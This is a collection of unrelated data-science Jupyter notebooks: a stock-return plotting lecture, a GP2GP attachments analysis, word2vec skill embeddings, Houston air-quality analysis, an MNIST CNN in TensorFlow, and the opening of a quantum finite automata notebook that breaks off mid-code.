quickly see where most of the observations are clustered. The height of each bar represents the number of observations that lie in each interval. You can think of a histogram as an empirical and discrete Propoability Density Function (PDF). ``` # Plot a histogram using 20 bins plt.hist(data['000001'], bins=20) plt.xlabel('Price') plt.ylabel('Number of Days Observed') plt.title('Frequency Distribution of 000001 Prices, 2014') ``` ### Returns Histogram In finance rarely will we look at the distribution of prices. The reason for this is that prices are non-stationary and move around a lot. For more info on non-stationarity please see [this lecture](https://www.quantopian.com/lectures/integration-cointegration-and-stationarity). Instead we will use daily returns. Let's try that now. ``` # Remove the first element because percent change from nothing to something is NaN R = data['000001'].pct_change()[1:] # Plot a histogram using 20 bins plt.hist(R, bins=20) plt.xlabel('Return') plt.ylabel('观察日期数量') plt.title('Frequency Distribution of 000001 Returns, 2014'); ``` The graph above shows, for example, that the daily returns of 000001 were above 0.03 on fewer than 5 days in 2014. Note that we are completely discarding the dates corresponding to these returns. #####IMPORTANT: Note also that this does not imply that future returns will have the same distribution. ### Cumulative Histogram (Discrete Estimated CDF) An alternative way to display the data would be using a cumulative distribution function, in which the height of a bar represents the number of observations that lie in that bin or in one of the previous ones. This graph is always nondecreasing since you cannot have a negative number of observations. The choice of graph depends on the information you are interested in. ``` # Remove the first element because percent change from nothing to something is NaN R = data['000001'].pct_change()[1:] # Plot a histogram using 20 bins plt.hist(R, bins=20, cumulative=True) plt.xlabel('Return') plt.ylabel('Number of Days Observed') plt.title('Cumulative Distribution of 000001 Returns, 2014'); ``` ## Scatter plot A scatter plot is useful for visualizing the relationship between two data sets. We use two data sets which have some sort of correspondence, such as the date on which the measurement was taken. Each point represents two corresponding values from the two data sets. However, we don't plot the date that the measurements were taken on. ``` plt.scatter(data['000001'], data['000333']) plt.xlabel('平安银行') plt.ylabel('美的集团') plt.title('Daily Prices in 2014'); R_000001 = data['000001'].pct_change()[1:] R_000333 = data['000333'].pct_change()[1:] plt.scatter(R_000001, R_000333) plt.xlabel('000001') plt.ylabel('000333') plt.title('Daily Returns in 2014') ``` # Line graph A line graph can be used when we want to track the development of the y value as the x value changes. For instance, when we are plotting the price of a stock, showing it as a line graph instead of just plotting the data points makes it easier to follow the price over time. This necessarily involves "connecting the dots" between the data points, which can mask out changes that happened between the time we took measurements. ``` plt.plot(data['000001']) plt.plot(data['000333']) plt.ylabel('Price') plt.legend(['000001', '000333']); # Remove the first element because percent change from nothing to something is NaN R = data['000001'].pct_change()[1:] plt.plot(R) plt.ylabel('Return') plt.title('000001 Returns') ``` ## Never Assume Conditions Hold Again, whenever using plots to visualize data, do not assume you can test a hypothesis by looking at a graph. Also do not assume that because a distribution or trend used to be true, it is still true. In general much more sophisticated and careful validation is required to test whether models hold, plots are mainly useful when initially deciding how your models should work. *This presentation is for informational purposes only and does not constitute an offer to sell, a solicitation to buy, or a recommendation for any security; nor does it constitute an offer to provide investment advisory or other services by Quantopian, Inc. ("Quantopian"). Nothing contained herein constitutes investment advice or offers any opinion with respect to the suitability of any security, and any views expressed herein should not be taken as advice to buy, sell, or hold any security or as an endorsement of any security or company. In preparing the information contained herein, Quantopian, Inc. has not taken into account the investment needs, objectives, and financial circumstances of any particular investor. Any views expressed and data illustrated herein were prepared based upon information, believed to be reliable, available to Quantopian, Inc. at the time of publication. Quantopian makes no guarantees as to their accuracy or completeness. All information is subject to change and may quickly become unreliable for various reasons, including changes in market conditions or economic circumstances.*
github_jupyter
# PRMT-2297: Look at attachments data from a supplier perspective ## Context We have performed some analysis on the attachments data set which suggests that nearly half of transfers contain no attachments. When we presented this in showcase we received feedback from clinical leads that they believe the number to be higher. It was suggested that one reason could be because some documents won't be included if, for example, they are EMIS and stored in Docman. ## Scope - Look at attachments data for 3 months - Identify the proportion of transfers per supplier that contain attachments - Identify the average no. attachments per transfer containing attachments, split by supplier - Look at attachments at a practice level for the following practices: - Clevedon Medical Centre - L81040 - Paxton Green Group Practice - G85039 - Vine Medical Centre - H81128 ``` import pandas as pd import numpy as np import datetime ``` #### Load Attachment Data ``` attachment_metadata_folder="s3://prm-gp2gp-data-sandbox-dev/" attachment_metadata_files = ["PRMT-2297-supplier-attachments/4-2021-attachment-metadata.csv.gz","PRMT-2297-supplier-attachments/5-2021-attachment-metadata.csv.gz","PRMT-2240-tpp-attachment-limit/6-2021-attachment-metadata.csv.gz"] attachments = pd.concat([pd.read_csv(attachment_metadata_folder+file, parse_dates=["_time"], na_values=["Unknown"], dtype={"Length": pd.Int64Dtype()}) for file in attachment_metadata_files]) relevant_attachments=attachments.loc[attachments['attachmentType']=='cid',['attachmentID','conversationID']].drop_duplicates() conversation_attachment_counts=relevant_attachments.groupby('conversationID').agg({'attachmentID':'count'}).rename({'attachmentID':'Number of Attachments'},axis=1) ``` #### Load Transfers ``` transfer_file_location = "s3://prm-gp2gp-data-sandbox-dev/transfers-sample-6/" transfer_files = [ "2021-4-transfers.parquet", "2021-5-transfers.parquet", "2021-6-transfers.parquet", ] transfer_input_files = [transfer_file_location + f for f in transfer_files] transfers = pd.concat(( pd.read_parquet(f) for f in transfer_input_files )) # Generate ASID lookup that contains all the most recent entry for all ASIDs encountered asid_file_location = "s3://prm-gp2gp-data-sandbox-dev/asid-lookup/asidLookup-Jun-2021.csv.gz" asid_lookup = pd.read_csv(asid_file_location) asid_lookup = asid_lookup.drop_duplicates().groupby("ASID").last().reset_index() lookup = asid_lookup[["ASID", "MName", "NACS","OrgName"]] transfers = transfers.merge(lookup, left_on='requesting_practice_asid',right_on='ASID',how='left') transfers = transfers.rename({'NACS': 'requesting_ods_code','OrgName':'requesting_practice_name'}, axis=1) transfers = transfers.merge(lookup, left_on='sending_practice_asid',right_on='ASID',how='left') transfers = transfers.rename({'NACS': 'sending_ods_code','OrgName':'sending_practice_name'}, axis=1) ``` #### Merge Data ``` full_transfers=transfers.merge(conversation_attachment_counts,left_on='conversation_id',right_index=True,how='left') full_transfers['Contains Attachments']=full_transfers['Number of Attachments']>0 full_transfers.shape[0] ``` ## What percentage of transfers contain attachments for each supplier Pathway? ``` supplier_table=full_transfers.groupby(['sending_supplier','requesting_supplier']).agg({'Contains Attachments':'mean','Number of Attachments':'mean'}) supplier_table=supplier_table.rename({'Contains Attachments':'% with Attachments','Number of Attachments':'Av attachments for transfers with attachments'},axis=1) supplier_table['% with Attachments']=supplier_table['% with Attachments'].multiply(100) supplier_table.fillna(0).round(1) ``` ## What % of transfers contain attachments for the practices in question? ``` practices={'Clevedon Medical Centre':'L81040','Paxton Green Group Practice':'G85039','Vine Medical Centre':'H81128'} practice_counts=full_transfers.groupby(['sending_ods_code','sending_practice_name','sending_supplier','requesting_supplier']).agg({'Contains Attachments':['sum','mean'],'Number of Attachments':'mean'}) practice_counts.columns=['Number of Transfers','% of Transfers with Attachments','Av. Attachments for attachment transfers'] #practice_counts=practice_counts.loc[practices.values()] practice_counts['% of Transfers with Attachments']=practice_counts['% of Transfers with Attachments'].multiply(100) practice_counts.loc[practices.values()].fillna(0).round(1) ``` ## Is the use of Docman based on the individual practice? ``` practice_table=practice_counts.reset_index() supplier_filter=(practice_table['sending_supplier']=='EMIS') & (practice_table['requesting_supplier']=='SystmOne') count_filter=practice_table['Number of Transfers']>10 ax= practice_table.loc[supplier_filter & count_filter,'% of Transfers with Attachments'].plot.hist() ax.set_xlabel("% of EMIS to TPP Transfers with Attachments (min 10 Transfers)") ax.set_ylabel("Number of EMIS Practices") practice_table=practice_counts.reset_index() supplier_filter=(practice_table['sending_supplier']=='SystmOne') & (practice_table['requesting_supplier']=='EMIS') count_filter=practice_table['Number of Transfers']>10 ax=practice_table.loc[supplier_filter & count_filter,'% of Transfers with Attachments'].plot.hist() ax.set_xlabel("% of TPP to EMIS Transfers with Attachments (min 10 Transfers)") ax.set_ylabel("Number of TPP Practices") ```
github_jupyter
``` import pandas as pd import numpy as np import cPickle from nltk.corpus import stopwords from gensim.models import word2vec import nltk.data import re import logging with open("prep_data_tokens_underscore_1", "rb") as g: data_dice = cPickle.load(g) print len(data_dice) data_dice[0] data_must_have = pd.read_csv('mustHaveSkills-2.csv', header = 0, encoding='ISO-8859-1') del data_must_have['job_brief_id'] print len(data_must_have) data_must_have = data_must_have.drop_duplicates(subset=['keyword_name', 'job_title'], keep='last') data_must_have = data_must_have[data_must_have["job_title"] != 0] print len(data_must_have) data_must_have['Count'] = data_must_have.groupby('job_title')['keyword_name'].transform(pd.Series.value_counts) data_must_have.drop_duplicates(inplace=True) data_must_have['keyword_name'] = data_must_have['keyword_name'].str.lower() data_must_have['keyword_name'] = data_must_have['keyword_name'].str.replace(' ' ,'_') data_must_have['job_title'] = data_must_have['job_title'].str.lower() # gr_df_keywordname = data_must_have.groupby('keyword_name')['job_title'].apply(list) gr_df_jobtitle = data_must_have.groupby('job_title')['keyword_name'].apply(list) gr_df_jobtitle must_have_data = [] for vector_list in gr_df_jobtitle: xx = list(set(vector_list)) if xx not in must_have_data: must_have_data.append(xx) len(must_have_data) must_have_data[0:2] data_naruki = pd.read_csv('naukri_skill_full', header = 0, encoding='ISO-8859-1') # drop duplicate data_naruki.drop_duplicates(subset=['id', 'skill'], keep='last') # lower-case data_naruki['skill'] = data_naruki['skill'].str.lower() data_naruki['skill'] = data_naruki['skill'].str.replace(' ','_') data_naruki_final = data_naruki.groupby('id')['skill'].apply(list) print len(data_naruki_final) data_naruki_final[:10] data_train_w2v = data_dice for must_have in gr_df_jobtitle: if len(must_have) > 2: if must_have not in data_train_w2v: data_train_w2v.append(must_have) len(data_train_w2v) for skills in data_naruki_final: if len(skills) > 2 and skills not in data_train_w2v: data_train_w2v.append(skills) len(data_train_w2v) with open('./duyet_data_train_w2v', 'wb') as f: cPickle.dump(data_train_w2v_for_check, f) with open('./duyet_data_train_w2v', 'rd') as f: data_train_w2v = cPickle.load(f) len(data_train_w2v) data_train_w2v_for_check = data_train_w2v data_train_w2v = [] for i in data_train_w2v_for_check: vector =[] for j in i: # TODO: remove stopword, clean if isinstance(j, unicode): if 1 == 1: # or j not in vector: vector.append(j) if i not in data_train_w2v: data_train_w2v.append(vector) print len(data_train_w2v) import multiprocessing logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) print ("Training model...") model = word2vec.Word2Vec(data_train_w2v, workers=multiprocessing.cpu_count(), # Number of threads to run in parallel size=300, min_count=1, window=10, sample = 1e-3, # Downsample setting for frequent words iter=4, sg =1 ) model.init_sims(replace=True) model.wv.save_word2vec_format('duyet_word2vec_skill.bin', binary=True) ``` # Testing ``` model.similar_by_word('machine_learning') model.similar_by_word('python') model.similar_by_word('css') model.similar_by_word('html') model.similar_by_word('html5') model.similar_by_word('bootstrap') model.similar_by_word('javascript') model.similar_by_word('nodejs') model.similar_by_word('node.js') model.similar_by_word('php') model.similar_by_word('c++') model.similar_by_word('web') model.similar_by_word('rails') model.similar_by_word('ruby') model.similar_by_word('mysql') model.similar_by_word('db2') model.similar_by_word('sql') model.similar_by_word('mssql') model.similar_by_word('db2') model.similar_by_word('html5') model.similar_by_word('oracle') model.similar_by_word('php5') model.similar_by_word('asp') model.similar_by_word('svm') model.similar_by_word('django') model.similar_by_word('mongodb') model.similar_by_word('mongo') model.similar_by_word('falcon') model.similar_by_word('express') model.similar_by_word('spark') model.similar_by_word('hadoop') model.similar_by_word('hive') model.similar_by_word('impala') model.similar_by_word('oozie') model.similar_by_word('nginx') model.similar_by_word('rest') model.similar_by_word('.net') model.similar_by_word('perl') model.similar_by_word('unity') model.similar_by_word('3d') model.similar_by_word('wordpress') model.similar_by_word('jquery') model.similar_by_word('ajax') ```
github_jupyter
``` import pandas as pd import datetime import matplotlib.pyplot as plt all_o3_df = pd.read_csv("./Resources/all_years_o3.csv") #turn date column elements into datetime objects all_o3_df["Date"] = pd.to_datetime(all_o3_df["Date"]) all_o3_df = all_o3_df.set_index("Date") all_pm25_df = pd.read_csv("./Resources/all_years_pm25.csv") #turn date column elements into datetime objects all_pm25_df["Date"] = pd.to_datetime(all_pm25_df["Date"]) all_pm25_df = all_pm25_df.set_index("Date") all_pm25_df.head() #select date range to measure PM2.5 for full shutdown - include all years #messy right now - turn into a function! #use Wuhan as an example earliest_year = min(all_pm25_df.index.year) latest_year = max(all_pm25_df.index.year) shutdown_start_date = (3, 19)#"1/23" shutdown_end_date = (4, 16)#"4/8" mask = ((pd.Series(map(lambda x: x.month <= shutdown_start_date[0], all_pm25_df.index.date), index=all_pm25_df.index)) & ((pd.Series(map(lambda x: x.day < shutdown_start_date[1], all_pm25_df.index.date), index=all_pm25_df.index)))) #first get dates after the start date for all years shutdown_time_period_pm_df = all_pm25_df.loc[~mask, :] #remove the later months shutdown_time_period_pm_df = shutdown_time_period_pm_df.loc[shutdown_time_period_pm_df.index.month<=shutdown_end_date[0]] #now get dates before the end date mask2 = ((pd.Series(map(lambda x: x.month == shutdown_end_date[0], shutdown_time_period_pm_df.index.date), index=shutdown_time_period_pm_df.index)) & ((pd.Series(map(lambda x: x.day >= shutdown_end_date[1], shutdown_time_period_pm_df.index.date), index=shutdown_time_period_pm_df.index)))) shutdown_time_period_pm_df = shutdown_time_period_pm_df.loc[~mask2, :] shutdown_time_period_pm_df = shutdown_time_period_pm_df.loc[shutdown_time_period_pm_df["City"] == "Houston"] print(shutdown_time_period_pm_df.head()) shutdown_time_period_pm_df.tail(10) #inputs for the function are the complete dataframe for one particulate (df), the city name (city), an integer tuple in the #form of (month, day) for the shutdown date (shutdown_date, for example (1, 23) for 1/23) - NOTE that this is the #date where the strictest lockdown regulations start for that city, and an integer tuple in the #form of (month, day) for the reopen date (reopen_date, for example (4, 8) for 4/8) - NOTE that this is the date when the city #begins to reopen from the strictest lockdown regulations # #returns a dataframe with the correct shutdown date ranges for all years in the data set def shutdownData(df, city, shutdown_date, reopen_date): mask = ((pd.Series(map(lambda x: x.month <= shutdown_date[0], df.index.date), index=df.index)) & ((pd.Series(map(lambda x: x.day < shutdown_date[1], df.index.date), index=df.index)))) #first get dates after the start date for all years shutdown_time_period_df = df.loc[~mask, :] #remove the later months shutdown_time_period_df = shutdown_time_period_df.loc[shutdown_time_period_df.index.month<=reopen_date[0]] #now get dates before the end date mask2 = ((pd.Series(map(lambda x: x.month == reopen_date[0], shutdown_time_period_df.index.date), index=shutdown_time_period_df.index)) & ((pd.Series(map(lambda x: x.day >= reopen_date[1], shutdown_time_period_df.index.date), index=shutdown_time_period_df.index)))) shutdown_time_period_df = shutdown_time_period_df.loc[~mask2, :] shutdown_time_period_df = shutdown_time_period_df.loc[shutdown_time_period_df["City"] == city] return shutdown_time_period_df test_df = shutdownData(all_pm25_df, "Houston", (3, 19), (4, 16)) print("The 'shutdownData' function is working correctly:", test_df.equals(shutdown_time_period_pm_df)) #so to get the ozone information for Wuhan between the shutdown date of 1/23 and the reopening date of 4/8, we #need to call the function as follows: houston_o3_shutdown_df = shutdownData(all_o3_df, "Houston", (3, 19), (4, 16)) houston_o3_shutdown_df #get average of medians by year bar_plot_info = shutdown_time_period_pm_df.groupby(shutdown_time_period_pm_df.index.year).mean() bar_plot_info #plot of average medians bar_plot_info.plot(kind="bar", y="median (ug/m3)", legend=None) plt.ylabel("Median PM2.5 ub/m3") plt.title("Houston Air Quality - PM2.5 Average Median") plt.savefig("./outputs/Houston/houston_pm25median.png") #plot of average maximums bar_plot_info.plot(kind="bar", y="max (ug/m3)", legend=None) plt.ylabel("Max PM2.5 ub/m3") plt.title("Houston Air Quality - Average Max PM2.5") plt.savefig("./outputs/Houston/houston_pm25max.png") #get percentage decrease year over year bar_plot_info.pct_change() #combine three previous years into an average median value prior_years_df = bar_plot_info.loc[bar_plot_info.index<2020] prior_averages = prior_years_df.mean() prior_averages summary_bar_plot = pd.DataFrame({"average median during shutdown dates (ug/m3)":[prior_averages["median (ug/m3)"], bar_plot_info["median (ug/m3)"][2020]]}, index=["Prior Years", "2020"]) summary_bar_plot.plot(kind="bar", legend=None) summary_bar_plot.pct_change() plt.ylabel("Avg Median PM2.5 ub/m3") plt.title("Houston Air Quality - Average Median PM2.5") plt.savefig("./outputs/Houston/houston_3yearMedianchange.png") summary_bar_plot.pct_change() line_plot, line_axes = plt.subplots() HO_2020_pm25_df = all_pm25_df.loc[(all_pm25_df.index.year == 2020) & (all_pm25_df["City"] == "Houston")] HO_line_axes = HO_2020_pm25_df.plot(kind="line", y="median (ug/m3)", legend=None, ax=line_axes) #set titles, axes labels HO_line_axes.set_title("Houston Air Quality 2020 - PM2.5") HO_line_axes.set_ylabel("PM2.5 Average Median (ug/m3)") HO_line_axes.set_xlabel("Month") HO_line_axes.get_figure().savefig("./outputs/Houston/HO_2020_line_plot.png") HO_2020_shutdown = HO_2020_pm25_df["3/19/20":"4/16/20"] shutdown_axes = HO_2020_shutdown.plot(y="median (ug/m3)", style="r", ax=line_axes) shutdown_axes.legend(["median (ug/m3)", "median (ug/m3) during shutdown"]) plt.savefig("./outputs/Houston/houston_2020pm25_line.png") line_plot #o3 #get average of medians by year bar_plot_info = houston_o3_shutdown_df.groupby(houston_o3_shutdown_df.index.year).mean() bar_plot_info #plot of average medians bar_plot_info.plot(kind="bar", y="median (ppb)", legend=None) plt.ylabel("Median O3") plt.title("Houston Air Quality - O3 Average Median") plt.savefig("./outputs/Houston/houston_o3median.png") #plot of average maximums bar_plot_info.plot(kind="bar", y="max (ppb)", legend=None) plt.ylabel("Max O3 ppb") plt.title("Houston Air Quality - Average Max O3") plt.savefig("./outputs/Houston/houston_o3max.png") #get percentage decrease year over year bar_plot_info.pct_change() #combine three previous years into an average median value prior_years_df = bar_plot_info.loc[bar_plot_info.index<2020] prior_averages = prior_years_df.mean() prior_averages summary_bar_plot = pd.DataFrame({"average median during shutdown dates (ppb)":[prior_averages["median (ppb)"], bar_plot_info["median (ppb)"][2020]]}, index=["Prior Years", "2020"]) summary_bar_plot.plot(kind="bar", legend=None) plt.ylabel("Avg Median O3 (ppb)") plt.title("Houston Air Quality - Average Median O3") plt.savefig("./outputs/Houston/houstono3_3yearMedianchange.png") summary_bar_plot.pct_change() ```
github_jupyter
## DR = (Digit Recognizer) - https://www.kaggle.com/c/digit-recognizer ``` import pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt import matplotlib.cm as cm import tensorflow as tf import time train = pd.read_csv("./input/train.csv") test = pd.read_csv("./input/test.csv") train.describe() train.shape train.head() learning_rate = 0.0001 total_train = 2500 drop_out = 0.7 batch_size = 50 VALIDATION_SIZE = 2000 IMAGE_TO_DISPLAY = 10 ``` ## 784 = 28 x 28 ``` images = train.iloc[:,1:].values images = images.astype(np.float) print(images) images = np.multiply(images, 1.0 / 255.0) print(len(images)) print('images({0[0]},{0[1]})'.format(images.shape)) ``` - image에서 1번 성분 추출 ``` image_size = images.shape[1] print(image_size) ``` - ceil 반올림 개념 ``` image_width = image_height = np.ceil(np.sqrt(image_size)).astype(np.uint8) print ('image_width => {0}\nimage_height => {1}'.format(image_width,image_height)) image_01 = images[400].reshape(image_width,image_height) plt.axis('off') plt.imshow(image_01, cmap = cm.binary) plt.show() # display image def display(img): # (784) => (28,28) one_image = img.reshape(image_width,image_height) plt.axis('off') plt.imshow(one_image, cmap=cm.binary_r) plt.show() # output image display(images[IMAGE_TO_DISPLAY]) labels_flat = train[[0]].values.ravel() print(labels_flat) print('labels_flat({0})'.format(len(labels_flat))) print ('labels_flat[{0}] => {1}'.format(IMAGE_TO_DISPLAY,labels_flat[IMAGE_TO_DISPLAY])) labels_count = np.unique(labels_flat).shape[0] print('labels_count => {0}'.format(labels_count)) def dense_to_one_hot(labels_dense, num_classes): num_labels = labels_dense.shape[0] index_offset = np.arange(num_labels) * num_classes labels_one_hot = np.zeros((num_labels, num_classes)) labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1 return labels_one_hot labels = dense_to_one_hot(labels_flat, labels_count) labels = labels.astype(np.uint8) print('labels({0[0]},{0[1]})'.format(labels.shape)) print ('labels[{0}] => {1}'.format(IMAGE_TO_DISPLAY,labels[IMAGE_TO_DISPLAY])) ``` ## Data process for tensorflow ``` validation_images = images[:VALIDATION_SIZE] validation_labels = labels[:VALIDATION_SIZE] train_images = images[VALIDATION_SIZE:] train_labels = labels[VALIDATION_SIZE:] print('train_images({0[0]},{0[1]})'.format(train_images.shape)) print('validation_images({0[0]},{0[1]})'.format(validation_images.shape)) ``` # Model ``` #images X = tf.placeholder(tf.float32, shape=[None, image_size]) #labels Y = tf.placeholder(tf.float32, shape=[None, labels_count]) weight_01 = tf.Variable(tf.truncated_normal([5,5,1,32],stddev=0.1)) bias_01 = tf.Variable(tf.constant(0.1,shape=[32])) print(weight_01) print(bias_01) ``` - The convolution computes 32 features for each 5x5 patch. Its weight tensor has a shape of [5, 5, 1, 32]. - tf.reshpte[-1(None), 넓이, 높이, 밀도] ``` image = tf.reshape(X, [-1, image_width, image_height,1]) print(image.get_shape()) con2d_01 = tf.nn.conv2d(image, weight_01, strides=[1,1,1,1], padding='SAME') print(con2d_01.shape) con2d_01 = con2d_01 + bias_01 print(con2d_01.shape) con2d_01 = tf.nn.relu(con2d_01) print(con2d_01.shape) con2d_01_mp = tf.nn.max_pool(con2d_01, ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME') print(con2d_01_mp.get_shape()) layer_01 = tf.reshape(con2d_01, (-1, image_height, image_width, 4, 8)) print(layer_01.shape) layer_01 = tf.transpose(layer_01, (0, 3, 1, 4,2)) print(layer_01.shape) layer_01 = tf.reshape(layer_01, (-1, image_height * 4, image_width * 8)) print(layer_01.shape) weight_02 = tf.Variable(tf.truncated_normal([5,5,32,64],stddev=0.1)) bias_02 = tf.Variable(tf.constant(0.1,shape=[64])) print(weight_02) print(bias_02) con2d_02 = tf.nn.conv2d(con2d_01_mp, weight_02, strides=[1,1,1,1], padding='SAME') print(con2d_02.shape) con2d_02 = con2d_02 + bias_02 print(con2d_02.shape) con2d_02 = tf.nn.relu(con2d_02) print(con2d_02.shape) con2d_02_mp = tf.nn.max_pool(con2d_02, ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME') print(con2d_02_mp.get_shape()) layer_02 = tf.reshape(con2d_02, (-1, 14, 14, 4 ,16)) print(layer_02.shape) layer_02 = tf.transpose(layer_02, (0, 3, 1, 4,2)) print(layer_02.shape) layer_02 = tf.reshape(layer_02, (-1, 14*4, 14*16)) print(layer_02.shape) weight_03 = tf.Variable(tf.truncated_normal([7*7*64, 1024],stddev=0.1)) bias_03 = tf.Variable(tf.constant(0.1,shape=[1024])) print(weight_03) print(weight_03.shape) print(bias_03) print(bias_03.shape) con2d_02_mp_flat = tf.reshape(con2d_02_mp, [-1, 7*7*64]) print(con2d_02_mp_flat.shape) hypothesis = tf.nn.relu(tf.matmul(con2d_02_mp_flat, weight_03) + bias_03) print(hypothesis) print(hypothesis.shape) keep_prob = tf.placeholder(tf.float32) hypothesis_do = tf.nn.dropout(hypothesis, keep_prob=keep_prob) # labels_count = 10 weight_04 = tf.Variable(tf.truncated_normal([1024, labels_count],stddev=0.1)) bias_04 = tf.Variable(tf.constant(0.1,shape=[labels_count])) print(weight_04) print(weight_04.shape) print(bias_04) print(bias_04.shape) output = tf.nn.softmax(tf.matmul(hypothesis_do, weight_04) + bias_04) print(output.shape) cost = - tf.reduce_sum(Y * tf.log(output)) optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost) ``` # 정확도 ``` prediction = tf.equal(tf.argmax(Y,1), tf.argmax(output,1)) accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32)) predict = tf.argmax(Y,1) ``` ## Training ``` epochs_completed = 0 index_in_epoch = 0 num_examples = train_images.shape[0] def next_batch(batch_size): global train_images global train_labels global index_in_epoch global epochs_completed start = index_in_epoch index_in_epoch += batch_size # when all trainig data have been already used, it is reorder randomly if index_in_epoch > num_examples: # finished epoch epochs_completed += 1 # shuffle the data perm = np.arange(num_examples) np.random.shuffle(perm) train_images = train_images[perm] train_labels = train_labels[perm] # start next epoch start = 0 index_in_epoch = batch_size assert batch_size <= num_examples end = index_in_epoch return train_images[start:end], train_labels[start:end] init = tf.global_variables_initializer() sess = tf.InteractiveSession() sess.run(init) train_accuracies = [] validation_accuracies = [] x_range = [] display_step=1 """ learning_rate = 0.0001 total_train = 2500 drop_out = 0.7 batch_size = 50 VALIDATION_SIZE = 2000 IMAGE_TO_DISPLAY = 10 """ start_time = time.time() for i in range(total_train): batch_xs, batch_ys = next_batch(batch_size) if i%display_step == 0 or (i+1) == total_train: train_accuracy = accuracy.eval(feed_dict={X:batch_xs, Y: batch_ys, keep_prob: 1.0}) if(VALIDATION_SIZE): validation_accuracy = accuracy.eval(feed_dict={ X: validation_images[0:batch_size], Y: validation_labels[0:batch_size], keep_prob: 1.0}) print('training_accuracy / validation_accuracy => %.2f / %.2f for step %d'%(train_accuracy, validation_accuracy, i)) validation_accuracies.append(validation_accuracy) else: print('training_accuracy => %.4f for step %d'%(train_accuracy, i)) train_accuracies.append(train_accuracy) x_range.append(i) if i%(display_step*10) == 0 and i: display_step *= 10 sess.run(optimizer, feed_dict={X: batch_xs, Y: batch_ys, keep_prob: drop_out}) estimated_time = time.time() - start_time print(estimated_time, "[second]") if(VALIDATION_SIZE): validation_accuracy = accuracy.eval(feed_dict={X: validation_images, Y: validation_labels, keep_prob: 1.0}) print('validation_accuracy => %.4f'%validation_accuracy) plt.plot(x_range, train_accuracies,'-b', label='Training') plt.plot(x_range, validation_accuracies,'-g', label='Validation') plt.legend(loc='lower right', frameon=False) plt.ylim(ymax = 1.1, ymin = 0.7) plt.ylabel('accuracy') plt.xlabel('step') plt.show() ``` # Result - accuracy = 98.5% - estimated time = 25.9[s] # Train에 대한 Test ``` test = test.astype(np.float) ``` - 0~255까지의 수를 0과 1 사이의 값으로 normalize ``` test = np.multiply(test, 1.0/255.0) print(test.shape) prediction_lables = np.zeros(test.shape[0]) print(prediction_lables) layer1_grid = layer_01.eval(feed_dict={X: test[7:7+1], keep_prob: 1.0}) plt.axis('off') plt.imshow(layer1_grid[0], cmap=cm.seismic ) plt.show() sess.close() ```
github_jupyter
<img src="../../../images/qiskit-heading.png" alt="Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook" width="500 px" align="left"> ## _*Comparing Classical and Quantum Finite Automata (QFA)*_ Finite Automaton has been a mathematical model for computation since its invention in the 1940s. The purpose of a Finite State Machine is to recognize patterns within an input taken from some character set and accept or reject the input based on whether the pattern defined by the machine occurs in the input. The machine requires a list of states, the initial state, and the conditions for each transition from state to state. Such classical examples are vending machines, coin-operated turnstiles, elevators, traffic lights, etc. In the classical algorithm, the sequence begins in the start state, and will only make a transition if the next character in the input string matches the label on the transition from the current to the next state. The machine will continue making transitions on each input character until no move is possible. The string will be accepted if its final state is in the accept state and will be rejected if its final state is anywhere else. As for Quantum Finite Automata (QFA), the machine works by accepting a finite-length string of letters from a finite alphabet and utilizing quantum properties such as superposition to assign the string a probability of being in either the accept or reject state. *** ### Contributors Kaitlin Gili, Rudy Raymond ## Prime Divisibility Algorithm Let's say that we have a string with $ a^i $ letters and we want to know whether the string is in the language $ L $ where $ L $ = {$ a^i $ | $ i $ is divisble by $ p $} and $ p $ is a prime number. If $ i $ is divisible by $ p $, we want to accept the string into the language, and if not, we want to reject it. $|0\rangle $ and $ |1\rangle $ serve as our accept and reject states. Classically, this algorithm requires a minimum of $ log(p) $ bits to store the information, whereas the quantum algorithm only requires $ log(log(p)) $ qubits. For example, using the highest known prime integer, the classical algorithm requires **a minimum of 77,232,917 bits**, whereas the quantum algorithm **only requires 27 qubits**. ## Introduction <a id='introduction'></a> The algorithm in this notebook follows that in [Ambainis et al. 1998](https://arxiv.org/pdf/quant-ph/9802062.pdf). We assume that we are given a string and a prime integer. If the user does not input a prime number, the output will be a ValueError. First, we demonstrate a simpler version of the quantum algorithm that uses $ log(p) $ qubits to store the information. Then, we can use this to more easily understand the quantum algorithm that requires only $ log(log(p)) $ qubits. ## The Algorithm for Log(p) Qubits The algorithm is quite simple as follows. 1. Prepare quantum and classical registers for $ log(p) $ qubits initialized to zero. $$ |0\ldots 0\rangle $$ 2. Prepare $ log(p) $ random numbers k in the range {$ 1 $... $ p-1 $}. These numbers will be used to decrease the probability of a string getting accepted when $ i $ does not divide $ p $. 3. Perform a number of $ i $ Y-Rotations on each qubit, where $ \theta $ is initially zero and $ \Phi $ is the angle of rotation for each unitary. $$ \Phi = \frac{2 \pi k}{p} $$ 4. In the final state: $$ \cos \theta |0\rangle + \sin \theta |1\rangle $$ $$ \theta = \frac{2 \pi k} p {i} $$ 5. Measure each of the qubits in the classical register. If $ i $ divides $ p $, $ \cos \theta $ will be one for every qubit and the state will collapse to $ |0\rangle $ to demonstrate an accept state with a probability of one. Otherwise, the output will consist of a small probability of accepting the string into the language and a higher probability of rejecting the string. ## The Circuit <a id="circuit"></a> We now implement the QFA Prime Divisibility algorithm with QISKit by first preparing the environment. ``` # useful additional packages import random import math from sympy.ntheory import isprime # importing QISKit from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister from qiskit import Aer, IBMQ, execute from qiskit.wrapper.jupyter import * from qiskit.backends.ibmq import least_busy from qiskit.tools.visualization import matplotlib_circuit_drawer as circuit_drawer from qiskit.tools.visualization import plot_histogram, qx_color_scheme IBMQ.load_accounts() sim_backend = Aer.get_backend('qasm_simulator') device_backend = least_busy(IBMQ.backends(operational=True, simulator=False)) device_coupling = device_backend.configuration()['coupling_map'] ``` We then use QISKit to program the algorithm. ``` #Function that takes in a prime number and a string of letters and returns a quantum circuit def qfa_algorithm(string, prime): if isprime(prime) == False: raise ValueError("This number is not a prime") #Raises a ValueError if the input prime number is not prime else: n = math.ceil((math.log(prime))) #Rounds up to the next integer of the log(prime) qr = QuantumRegister(n) #Creates a quantum register of length log(prime) for log(prime) qubits cr = 